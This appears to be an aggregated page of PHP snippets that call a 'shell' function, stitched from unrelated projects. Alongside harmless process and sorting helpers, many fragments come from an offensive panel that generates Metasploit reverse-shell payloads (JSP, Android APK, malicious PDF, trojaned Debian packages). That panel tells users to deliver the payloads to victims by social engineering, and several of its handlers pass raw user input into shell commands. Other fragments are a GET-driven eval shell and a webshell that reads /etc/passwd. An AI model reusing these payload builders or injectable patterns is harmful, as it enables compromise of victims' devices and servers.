示例#1
0
function ps($fields)
{
    $out = shell(sprintf('ps -eo %s 2>&1', escapeshellarg($fields)));
    $ret = array();
    foreach (array_slice(preg_split('/\\R/', $out), 1, -1) as $line) {
        $ret[] = $line;
    }
    return $ret;
}
function create_tables()
{
    if (file_exists(DB)) {
        $cmd = 'rm -f ' . DB;
        shell($cmd);
    }
    $db = new SQLite3(DB);
    $db->exec("BEGIN DEFERRED;");
    query('CREATE TABLE comics (id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT, pages INTEGER, zip_path TEXT, cover TEXT);', $db);
    query('CREATE TABLE images (id INTEGER PRIMARY KEY AUTOINCREMENT, comics_id INTEGER, page INTEGER, filepath TEXT);', $db);
    $db->exec("COMMIT;");
    return true;
}
示例#3
0
function trash_run($args)
{
    define('ID_COLUMN', getOption('id-col', $args));
    $input = getOption('input-file', $args);
    $jobDate = shell('date +"%F %R"');
    if ($args['undelete']) {
        define('UNDELETE', TRUE);
        $apiTag = createJobTag($jobDate, 'UNDelete CiviCRM Contacts');
    } else {
        define('UNDELETE', FALSE);
        $apiTag = createJobTag($jobDate, 'Delete CiviCRM Contacts');
    }
    define('TAG_ID', $apiTag->id);
    $main = 'processContacts';
    withFile($input, $main);
}
示例#4
0
function ps_query()
{
    $out = shell('ps -eo pid,ppid,pgid,comm,args');
    $ret = array();
    foreach (array_slice(preg_split('/\\R/', $out), 1, -1) as $line) {
        preg_match('/(\\d+)\\s+(\\d+)\\s+(\\d+)\\s+(\\S+)\\s+(.*)/', $line, $m);
        $ret[] = array('pid' => intval($m[1]), 'ppid' => intval($m[2]), 'pgid' => intval($m[3]), 'comm' => $m[4], 'args' => $m[5]);
    }
    usort($ret, function ($a, $b) {
        $cmp = $a['ppid'] - $b['ppid'];
        if ($cmp == 0) {
            $cmp = $a['pid'] - $b['pid'];
        }
        return $cmp;
    });
    return $ret;
}
示例#5
0
文件: shell.php 项目: jinguanio/david
#
function shell($arr)
{
    $n = count($arr);
    $h = 1;
    while ($h < $n / 3) {
        $h = $h * 3 + 1;
    }
    while ($h >= 1) {
        for ($i = 1; $i < $n; $i++) {
            for ($j = $i; $j >= $h; $j = $j - $h) {
                if ($arr[$j] < $arr[$j - $h]) {
                    swap($arr, $j, $j - $h);
                } else {
                    break;
                }
            }
        }
        $h = floor($h / 3);
    }
    return $arr;
}
function swap(&$arr, $i, $j)
{
    $tmp = $arr[$i];
    $arr[$i] = $arr[$j];
    $arr[$j] = $tmp;
}
$arr = [1, 43, 54, 62, 21, 66, 32, 78, 36, 76, 39];
print_r(shell($arr));
     exec("sudo zip exploits/{$pkg}.zip exploits/{$pkg}.jsp");
     echo '<p><b>Payload Configuration</b></p>';
     echo '****************************************************************************';
     echo '<p><b>LHOST</b>                     -->' . $ip . '</p>';
     echo '<p><b>LPORT</b>                     -->' . $port . '</p>';
     echo '<p><b>PACKAGE NAME</b>              -->' . $pkg . '.jsp</p>';
     echo '<p><b>PAYLOAD</b>                   -->java/jsp_shell_reverse_tcp</p>';
     echo '<p><b>AVAILABLE FOR DOWNLOAD @</b>  --><a href=exploits/' . $pkg . '.zip>click here</a>';
     echo '<p><b>AFFECTED SYSTEMS ARE</b>      -->Websites(jsp)</p>';
     echo '<p>*****************************************************************************</p>';
     echo '<b>Note:</b> Upload this shell on website supporting JSP and start meterpreter listener ';
     echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
     echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli exploit/multi/handler PAYLOAD=java/jsp_shell_reverse_tcp   LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>';
     break;
 case c16:
     shell("echo '[Wait] While i generate your {$pkg}.apk payload..........'");
     exec("sudo msfpayload android/meterpreter/reverse_tcp LHOST={$ip} LPORT={$port} R >exploits/{$pkg}.apk");
     exec("sudo chmod +x exploits/{$pkg}.apk");
     echo '<p><b>Payload Configuration</b></p>';
     echo '****************************************************************************';
     echo '<p><b>LHOST</b>                     -->' . $ip . '</p>';
     echo '<p><b>LPORT</b>                     -->' . $port . '</p>';
     echo '<p><b>PACKAGE NAME</b>              -->' . $pkg . '.apk</p>';
     echo '<p><b>PAYLOAD</b>                   -->android/meterpreter/reverse_tcp</p>';
     echo '<p><b>AVAILABLE FOR DOWNLOAD @</b>  --><a href=exploits/' . $pkg . '.apk>Click here</a>';
     echo '<p><b>AFFECTED SYSTEMS ARE</b>      -->Android OS</p>';
     echo '<p>*****************************************************************************</p>';
     echo '<b>Note:</b>You can send this package to victim by any social engineering techniques ';
     echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
     echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp  LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>';
     break;
示例#7
0
             } else {
                 echo '<p>Emplacement de téléportation introuvable</p>';
             }
         } else {
             echo '<p>Joueur introuvable</p>';
         }
     } else {
         echo "Erreur";
     }
     break;
 case "motd":
     echo "\n\t\t\t\t<p class=\"title\">Modifier le MOTD</p>\n\t\t\t\t<p><form method=\"post\" action=\"index.php?module=shell&action=motd_v\">\n\t\t\t\t\tNouveau message du jour : <input type=\"text\" name=\"motd\"><br />\n\t\t\t\t\t<p>Attention : Eviter les accents</p>\n\t\t\t\t\t<center><input type=\"submit\" name=\"ok\" value=\"Envoyer\"></center>\n\t\t\t\t</form></p>";
     break;
 case "motd_v":
     $motd = $_POST['motd'];
     $send = shell('server set motd ' . $motd);
     if ($send) {
         echo "<p>Le message du jour à été redéfini en " . $motd . ".</p>";
     } else {
         echo "<p>Erreur lors de l'envoie</p>";
     }
     break;
 case "ticket":
     echo "\n\t\t\t\t<p class=\"title\">Voir un ticket</p>\n\t\t\t\t<p>Remplir un des deux champs</p>\n\t\t\t\t<p><form method=\"post\" action=\"index.php?module=shell&action=ticket_v\">\n\t\t\t\t\tNom ou ID du personnage : <input type=\"text\" name=\"char\"><br />\n\t\t\t\t\tID du ticket : <input type=\"text\" name=\"ticket\">\n\t\t\t\t\t<center><input type=\"submit\" name=\"ok\" value=\"Voir\"></center>\n\t\t\t\t</form></p>";
     break;
 case "ticket_v":
     if (isset($_POST['ok'])) {
         require "../kernel/config.php";
         mysql_connect($characters[1]['host'], $characters[1]['user'], $characters[1]['password']) or die(mysql_error());
         $char = mysql_real_escape_string($_POST['char']);
         $ticket = mysql_real_escape_string($_POST['ticket']);
                die("Bad, very bad, this characters are not accepted: ; | & %");
            }
            $str .= $value;
        }
        $url = trim($url);
        //remove space from start and end of url
        if (substr(strtolower($url), 0, 7) == "http://") {
            $url = substr($url, 7);
        }
        // remove http:// if included
        if (substr(strtolower($url), 0, 8) == "https://") {
            $url = substr($url, 8);
        }
        $url_parts = explode("/", $url);
        $url = $url_parts[0];
        shell("sudo nmap {$str} {$url}");
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                 
 ';
        echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Nmap Done ! See result in result section'});</script>";
    }
}
?>
 $ip = $_POST['ip'];
 $port = $_POST['port'];
 $pkg = $_POST['pkg'];
 $c = $_POST['c'];
 if ($ip == '' || $port == '') {
     echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'You Have not entered datas correctly...'});</script>";
 } else {
     echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Generating Payloads, please wait... ! Please refer result section after this message'});</script>";
     require_once 'loading.php';
     exec("sudo rm -r exploits/ && sudo mkdir exploits && sudo chmod 777 -R exploits/");
     if (move_uploaded_file($_FILES['userfile']['tmp_name'], $pkg)) {
         echo "File is valid, and was successfully uploaded.\n" . "<br/>";
         shell("echo '[Wait] While I generate your payload......'");
         exec("sudo chmod 777 {$pkg}");
         exec("sudo msfcli exploit/windows/fileformat/adobe_pdf_embedded_exe LHOST={$ip} LPORT={$port} INFILENAME=/var/www/lab/{$pkg}  FILENAME=veer.pdf PAYLOAD={$c} E\n");
         shell("sudo mv /root/.msf4/local/veer.pdf exploits/{$pkg}");
         exec("sudo rm {$pkg} && sudo chmod 755  exploits/{$pkg}");
         exec("sudo zip exploits/{$pkg}.zip exploits/{$pkg} ");
         echo '<p><b>Payload Configuration</b></p>';
         echo '****************************************************************************';
         echo '<p><b>LHOST</b>                     -->' . $ip . '</p>';
         echo '<p><b>LPORT</b>                     -->' . $port . '</p>';
         echo '<p><b>PACKAGE NAME</b>              -->' . $pkg . '</p>';
         echo '<p><b>PAYLOAD</b>                   -->' . $c . '</p>';
         echo '<p><b>AVAILABLE FOR DOWNLOAD zip format @</b>  --><a href=exploits/' . $pkg . '.zip>Click here</a>';
         echo '<p><b>AFFECTED SYSTEMS ARE</b>      --> Adobe Reader v8.x, v9.x (Windows OS)</p>';
         echo '<p>*****************************************************************************</p>';
         echo '<b>Note:</b>You can send this package to victim by any social engineering techniques  ';
         echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
         echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli exploit/multi/handler PAYLOAD=' . $c . ' LHOST=' . $ip . ' LPORT=' . $port . ' E <b></code>';
     } else {
示例#10
0
<?php

require __DIR__ . '/../share/app.php';
$f = isset($_GET['f']) ? strval($_GET['f']) : __DIR__;
if (isset($_GET['q']) && trim($_GET['q']) != '') {
    $out = shell(sprintf('locate %s', escapeshellarg(trim($_GET['q']))));
    $fields = array(new TableFieldIcon(), new TableFieldLink('Name', 'path', function (FileModel $file) {
        return url(array('q' => false, 'f' => $file->path()));
    }), new TableField('Type', 'type'), new TableFieldFormat('Size', 'size', 'format_bytes'), new TableField('MIME', 'mime'), new TableField('Permissions', 'perms'));
    $rows = array();
    foreach (explode("\n", $out) as $row) {
        if (!empty($row)) {
            $rows[] = new TableRow(new FileModel($row), $fields);
        }
    }
    $middle = render_str('foobar/table', compact('fields', 'rows'));
} else {
    $file = new FileModel($f);
    if (is_dir($f)) {
        $fields = array(new TableFieldIcon(), new TableFieldLink('Name', 'basename', function (FileModel $file) {
            return url(array('q' => false, 'f' => $file->path()));
        }), new TableField('Type', 'type'), new TableFieldFormat('Size', 'size', 'format_bytes'), new TableField('MIME', 'mime'), new TableField('Owner', 'owner'), new TableField('Group', 'group'), new TableField('Permissions', 'perms'));
        $rows = $file->rows();
        $middle = render_str('foobar/table', array('fields' => $fields, 'rows' => new TableRowGenerator($rows, $fields)));
    } else {
        switch ($file->mime()) {
            case 'audio/mpeg':
                if (begins($file->realpath(), $_SERVER['DOCUMENT_ROOT'])) {
                    $middle = render_str('foobar/audio', array('src' => replace_prefix($file->realpath(), $_SERVER['DOCUMENT_ROOT'], '/')));
                } else {
                    $middle = render_str('foobar/audio', array('src' => 'image.php?' . http_build_query(array('f' => $file->realpath()))));
            shell(" sslyze {$url}:{$port0} |sed -e '1,11d'");
        }
        if (isset($c5)) {
            echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'Checking  if {$url} uses load balancing..See details in Result section'});</script>";
            echo "<p><b>Checking  if {$url} uses load balancing</b></p>";
            shell("lbd {$url}|sed -e '1,3d'");
        }
        if (isset($c6)) {
            echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'Detecting firewall for {$url}..See details in Result section'});</script>";
            echo "<p><b>Detecting firewall for  {$url} :</b></p>";
            shell("wafw00f {$url} |sed -e '1,13d'");
        }
        if (isset($c7)) {
            echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'Detecting Application @ {$port} on  {$url}..See details in Result section'});</script>";
            echo "<p><b>Detecting Application at port  {$port} on {$url}  :</b></p>";
            shell("sudo amap -A {$url} {$port}|grep 'Protocol\\|Unidentified'");
        }
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'Scanning Done for {$url}..See details in Result section'});</script>";
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                 
            ';
    } else {
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : '!!!!You have not selected any option!!!!'});</script>";
示例#12
0
    $time = microtime(true);
    $f($x);
    return microtime(true) - $time;
});
defun('tabulate', function ($h1, $h2, $arr) {
    return key_foldr(function ($str, $row) {
        list($n, $v) = $row;
        $v = is_array($v) ? implode(' ', $v) : $v;
        $s = format($v);
        return "{$str}\n{$n} {$s}";
    }, "{$h1} " . (is_array($h2) ? implode(' ', $h2) : $h2), $arr);
});
defun('shell', 'shell_exec');
defun('mem', function ($cmd) {
    $time = trim(substr(`whereis time`, 6));
    return intval(shell("{$time} -f '%M' {$cmd} 2>&1 1> /dev/null"));
});
defun('runphp', function ($f, $arg) {
    return "./runphp '{$f}({$arg})'";
});
function papply()
{
    $args = func_get_args();
    $f = op(array_shift($args));
    return function () use($args, $f) {
        static $curried = true;
        return call_user_func_array('call_user_func', array_merge($args, func_get_args()));
    };
}
defun('parens', function ($x) {
    return "({$x})";
示例#13
0
           var yPos  = row;
           $(root).find('.cell[pos=p-' + xPos1 + '-' + yPos + ']').removeClass('on').addClass(cssClass);
           $(root).find('.cell[pos=p-' + xPos2 + '-' + yPos + ']').removeClass('on').addClass(cssClass);
         }
       }
     }


     $(document).ready(function() {
       function spawn() {
         $('.invader').each(function() { render(this, dna()); });
       }

       spawn();
       setInterval(spawn, 1000);
     });
   </script>

   <?php 
for ($i = 0; $i < 300; $i++) {
    ?>
     <?php 
    echo shell();
    ?>
   <?php 
}
?>

  </body>
</html> 
示例#14
0
function ts_info($job_id)
{
    return shell(sprintf('tsp -i %s 2>&1', escapeshellarg($job_id)));
}
 if ($ip == '' || $port == '') {
     echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'You Have not entered datas correctly...'});</script>";
 } else {
     echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Generating Payloads, please wait... ! Please refer result section after this message'});</script>";
     require_once 'loading.php';
     echo "<fieldset>";
     switch ($p) {
         case p1:
             $sh = "freesweep.sh";
             $pkg = "freesweep.deb";
             shell("sudo sh cmd/debian/{$sh} {$c} {$ip} {$port} {$uname}");
             break;
         case p2:
             $sh = "xbomb.sh";
             $pkg = "xbomb.deb";
             shell("sudo sh cmd/debian/{$sh} {$c} {$ip} {$port} {$uname}");
             break;
     }
     echo '<p><b>Payload Configuration</b></p>';
     echo '****************************************************************************';
     echo '<p><b>LHOST</b>                     -->' . $ip . '</p>';
     echo '<p><b>LPORT</b>                     -->' . $port . '</p>';
     echo '<p><b>PACKAGE NAME</b>              -->' . $pkg . '</p>';
     echo '<p><b>PAYLOAD</b>                   -->' . $c . '</p>';
     echo '<p><b>AVAILABLE FOR DOWNLOAD @</b>  --><a href=exploits/' . $pkg . '>Click here</a>';
     echo '<p><b>AFFECTED SYSTEMS ARE</b>      -->Debian Based Linux Distributions</p>';
     echo '<p>*****************************************************************************</p>';
     echo '<b>Note:</b>You can send this package to victim by any social engineering techniques  ';
     echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
     echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b> sudo msfcli exploit/multi/handler PAYLOAD=' . $c . '  LHOST=' . $ip . ' LPORT=' . $port . ' E  </b></code>';
     $host = $_SERVER['SERVER_ADDR'];
示例#16
0
function mostrararchivo($ruta, $loc = true)
{
    static $leidos;
    //Si hay alguna funcion especial que bypassee el open_basedir tiene que ir acá
    $ruta = realpath($ruta);
    if (filesize($ruta) < 50000) {
        if (strpos($leidos, "\n" . $ruta . "\n") == false) {
            $leidos .= "\n" . $ruta . "\n";
            $contenido = htmlentities(leerarchivo(ltrim($ruta)), ENT_QUOTES, 'UTF-8');
            if ($contenido) {
                $lineas = substr_count($contenido, "\n");
                if ($lineas > 15) {
                    $lineas = 15;
                }
                echo '<div class="s">' . htmlentities($ruta, ENT_QUOTES, 'UTF-8') . ':</div><textarea style="width:100%;" rows="' . $lineas . '">' . $contenido . '</textarea><br><br>';
            } elseif ($loc and $loc != "''") {
                //usamos locate para encontrar mas archivos con ese nombre
                echo $ruta . "<br>";
                $locate = shell("locate " . escapeshellarg(basename($ruta)), false);
                $locate = explode("\n", $locate);
                if ($locate) {
                    foreach ($locate as $ubicacion) {
                        mostrararchivo($ubicacion, false);
                    }
                }
            }
        }
    } else {
        echo '<div class="n" style="text-decoration: underline;">No se puede leer ' . htmlentities($ruta, ENT_QUOTES, 'UTF-8') . ' porque supera los 50000 bytes</div><br>';
    }
}
                
               <?php 
if (isset($_POST['submit'])) {
    $url = $_POST['url'];
    $c = $_POST['c'];
    $check = $_POST['check'];
    if ($url == '') {
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
    } else {
        echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'BlindElephant scan for {$url} ! Please refer result section after this message'});</script>";
        require_once 'loading.php';
        if (isset($check)) {
            echo "<p><b>Guessing the name of CMS</b></p>";
            shell(" BlindElephant.py {$url} guess");
        } else {
            shell("BlindElephant.py {$url} {$c}");
        }
        echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'BlindElephant Scan ! See Full result in result section'});</script>";
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                 
 ';
    }
}
示例#18
0
        }
    }
    for ($i = 0, $max = count($FILES); $i < $max; $i++) {
        $FILE = $FILES[$i];
        if (isset($time)) {
            if ($filter === 2) {
                if (filemtime("scans/thumb/{$FILE}") < $time) {
                    continue;
                }
            } else {
                if ($filter === 1) {
                    if (filemtime("scans/thumb/{$FILE}") > $time) {
                        continue;
                    }
                } else {
                    if ($filter === 3) {
                        if (!(filemtime("scans/thumb/{$FILE}") > $time[1] && filemtime("scans/thumb/{$FILE}") < $time[0])) {
                            continue;
                        }
                    }
                }
            }
        }
        $FILE = substr($FILE, 7, -3);
        $FILE = substr(exe("cd 'scans/file'; ls " . shell("Scan{$FILE}") . '*', true), 5, -1);
        //Should only have one file listed
        $IMAGE = $FILES[$i];
        echo '<div class="box" id="' . html($FILE) . '">' . '<h2 ondblclick="toggleFile(this);" class="excluded">' . html($FILE) . '</h2><p><span>' . genIconLinks(null, "Scan_{$FILE}", false) . '</span><br/>' . '<a class="tool" target="_blank" href="scans/file/Scan_' . url($FILE) . '" style="width:100%;"><img src="scans/thumb/' . url($IMAGE) . '" alt="' . html($FILE) . '" style="width:100%"/><span class="tip">View raw file</span></a>' . '</p></div>';
    }
    echo '</div><script type="text/javascript">' . 'if(typeof document.body.style.MozColumnGap=="string")' . 'getID("scans").className="columns";' . 'else ' . 'enableColumns("scans",null,' . (isset($_COOKIE["columns"]) ? 'true' : 'false') . ');</script>';
}
                $url = substr($url, 7);
            }
            // remove http:// if included
            if (substr(strtolower($url), 0, 8) == "https://") {
                $url = substr($url, 8);
            }
            // remove http:// if included
            if (substr(strtolower($url), 0, 4) == "www.") {
                $url = substr($url, 4);
            }
            //remove www from domain
            $url_parts = explode("/", $url);
            $url = $url_parts[0];
            echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : ' investigating IP Addresses and URLs with the common web based tools'});</script>";
            shell("echo 'Investigating IP Addresses and URLs with  common web based tools' ");
            shell("sudo automater -t {$url}|sed -e'1,13d'");
        }
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                
            ';
    } else {
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : '!!!!You have not selected any option!!!!'});</script>";
        die("!!!!You Have Not Selected any option!!!!");
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
    } else {
        if (isset($c0)) {
            require_once 'loading.php';
            switch ($c0) {
                case c1:
                    echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content :'starting ping-sweep using nmap'});</script>";
                    echo "<p><b>Discovering which hosts are up within a range of IP addresses {$url}:</b></p>";
                    shell("echo 'Wait.........'");
                    shell(" sudo nmap  -sP -T Insane {$url}|sed -e '1,2d'");
                    break;
                case c2:
                    echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content :'Scanning Network {$url} for NetBIOS Name.Refer Result Section for details'});</script>";
                    echo "<p><b>Scanning Network {$url} for NetBIOS Name</b></p>";
                    shell("cho 'Wait........'");
                    shell("sudo nbtscan -r {$url}");
                    break;
            }
            echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content :'Scanning Done '});</script>";
            echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                 
 ';
        }
示例#21
0
function shell_pstree($pid)
{
    return shell(sprintf('pstree -a %s 2>&1', escapeshellarg($pid)));
}
示例#22
0
/**
 * Use civicrm/bin/cli.php to call the API
 * NOTE: requires core hack to add --json output option.
 * https://gist.github.com/ginkgomzd/b26a750b2fbd3ce25950
 *
 * @param type $entity
 * @param type $action
 * @param type $params
 * @return type
 */
function cvCli($entity, $action, $params = array())
{
    if (function_exists("civicrm_api3")) {
        try {
            return civicrm_api3($entity, $action, $params);
        } catch (CiviCRM_API3_Exception $e) {
            echo $e->getMessage();
            return null;
        }
    }
    $cmdApi = CIVICRM_ROOT . '/bin/cli.php';
    $clParams = '';
    foreach ($params as $key => $value) {
        $clParams .= " --{$key}=\"{$value}\"";
    }
    $call = "php {$cmdApi} -e {$entity} -a {$action} {$clParams} --json";
    echo $call . "\n";
    $apiResult = json_decode(shell($call));
    return $apiResult;
}
                shell("sudo python ./harvester/theHarvester.py -d {$url} -l {$limit} -v -t -b {$c}");
            } elseif (isset($c2) && isset($c3)) {
                shell("");
                shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -n -t -b {$c}");
            } elseif (isset($c1)) {
                shell("");
                shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -v   -b {$c}");
            } elseif (isset($c2)) {
                shell("");
                shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -n   -b {$c}");
            } elseif (isset($c3)) {
                shell("");
                shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -t   -b {$c}");
            } else {
                shell("");
                shell("python ./harvester/theHarvester.py -d {$url} -l {$limit}  -b {$c}");
            }
        }
        echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Info Harvesting Completed!You Can see Full result in result section'});</script>";
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                 
 ';
    }
    if ($url == '') {
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/',  content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
    } else {
        if (isset($c)) {
            require_once 'loading.php';
            switch ($c) {
                case c1:
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Getting HTTP Header!Please refer result section after this message'});</script>";
                    echo "<p><b>Getting HTTP Header on {$url}</b></p>";
                    shell("sudo curl -I {$url}");
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'See HTTP Header details for {$url} in Result Section'});</script>";
                    break;
                case c2:
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Dumping all the links of  {$url} in your web page!Please refer result section after this message'});</script>";
                    echo "<p><b>Dumping all the links of  {$url} in your web page</b></p>";
                    shell(" lynx -dump {$url} ");
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Links dumped from {$url} to your result section'});</script>";
                    break;
                case c3:
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Checking link status on {$url} !Refer Result Section For Detail'});</script>";
                    require 'microLink.php';
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Done!Please refer result section after this message'});</script>";
                    break;
            }
        }
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
                    shell("dig +nocmd {$url} any +multiline +noall +answer");
                    break;
                case c7:
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Execution Started!Please refer result section after this message'});</script>";
                    echo "<p><b>Bruteforcing DNS-Records for Domain {$url} </b></p>";
                    shell("sudo nmap -Pn -p 80 --script dns-brute {$url}|sed -e '1,4d'");
                    break;
                case c8:
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Viewing DNS Records for {$url}!Please refer result section after this message'});</script>";
                    echo "<p><b>Viewing DNS Records for {$url} </b></p>";
                    shell("host -t any {$url}");
                    break;
                case c9:
                    echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/',  content : 'Tracing a chain of DNS Server to the source!Please refer result section after this message'});</script>";
                    echo "<p><b>Tracing a chain of DNS Server to the source </b></p>";
                    shell("dnstracer {$url}");
                    break;
            }
        }
        echo '</div>
                                    <footer>
				<div align="left">
					
					<h3>Thank You!</h3>
				</div>
			</footer>
		</article><!-- end of styles article -->
                 <h4 class="alert_success">Scan Succeeded </h4>
                 
 ';
    }
示例#26
0
    $_shell_session->start();
    header("Content-Type: text/html; charset=utf-8");
    extract($_shell_session->getLocals(), EXTR_SKIP);
    // Disable all error reporting, otherwise it mess with the output.
    error_reporting(0);
    // Errors are handled with an error handler and a fatal error handler, because
    // exceptions are not catchable when evaluating code.
    register_shutdown_function('shutdown_handler');
    set_error_handler('error_handler');
    ob_start(['Session', 'scrubOutput']);
    eval($_shell_session->prependUseStatements($_shell_statement));
    ob_end_flush();
    $_shell_session->end($_shell_statement, get_defined_vars());
}
session_start();
if (!isset($_SESSION["session"])) {
    $_SESSION["session"] = new Session();
}
if (isset($_SESSION['token']) && $_GET['token'] === $_SESSION['token']) {
    // Append a semi-colon just in case the statement doen't have one. An extra
    // semi-colon makes no harm.
    shell($_GET["statement"] . ";", $_SESSION["session"]);
} else {
    if (!isset($_SESSION['token'])) {
        syslog(LOG_ERR, 'Missing session token');
        echo "Session token missing - Please reset your session.";
    } else {
        syslog(LOG_ERR, 'Mismatch session token.');
        echo "Invalid session token - Please reset your session.";
    }
}
示例#27
0
function mostrarinformacion()
{
    $ruta = getcwd() or '/';
    if (!ini_get('safe_mode') or strtolower(ini_get('safe_mode')) == 'off') {
        $safemode = 'No';
    } else {
        $safemode = 'Si';
    }
    $salida = '<b>' . htmlentities(__FILE__, ENT_QUOTES, 'UTF-8') . '</b><br><br>
    <b>' . htmlentities(decodeSize(disk_free_space($ruta)), ENT_QUOTES, 'UTF-8') . '</b> / <b>' . htmlentities(decodeSize(disk_total_space($ruta)), ENT_QUOTES, 'UTF-8') . '</b><br><br>
    <b>PHP:</b> ' . htmlentities(phpversion(), ENT_QUOTES, 'UTF-8') . '<br><br>
    <b>Zend:</b> ' . htmlentities(zend_version(), ENT_QUOTES, 'UTF-8') . '<br><br>
    <b>Safe_mode:</b> ' . $safemode . '<br><br>
    <b>Funciones desactivadas:</b> ' . htmlentities(ini_get('disable_functions'), ENT_QUOTES, 'UTF-8') . '<br><br>
    <b>Open basedir:</b> ' . htmlentities(ini_get('open_basedir'), ENT_QUOTES, 'UTF-8') . '<br><br>
    <b>' . htmlentities(php_uname(), ENT_QUOTES, 'UTF-8') . '</b><br><br>';
    if ($id = shell('id', false)) {
        $salida .= '<b>' . htmlentities($id, ENT_QUOTES, 'UTF-8') . '</b><br><br>
        ' . htmlentities(shell('whereis gcc', false), ENT_QUOTES, 'UTF-8') . '<br><br>
        ' . htmlentities(shell('whereis perl', false), ENT_QUOTES, 'UTF-8') . '<br><br>
        ' . htmlentities(shell('whereis python', false), ENT_QUOTES, 'UTF-8') . '<br><br>
        ' . htmlentities(shell('whereis curl', false), ENT_QUOTES, 'UTF-8') . '<br><br>
        ' . htmlentities(shell('whereis wget', false), ENT_QUOTES, 'UTF-8') . '<br><br>
        <br>
        ';
    }
    if ($usuarios = leerarchivo('/etc/passwd')) {
        $salida .= '<b>/etc/passwd:</b><br>
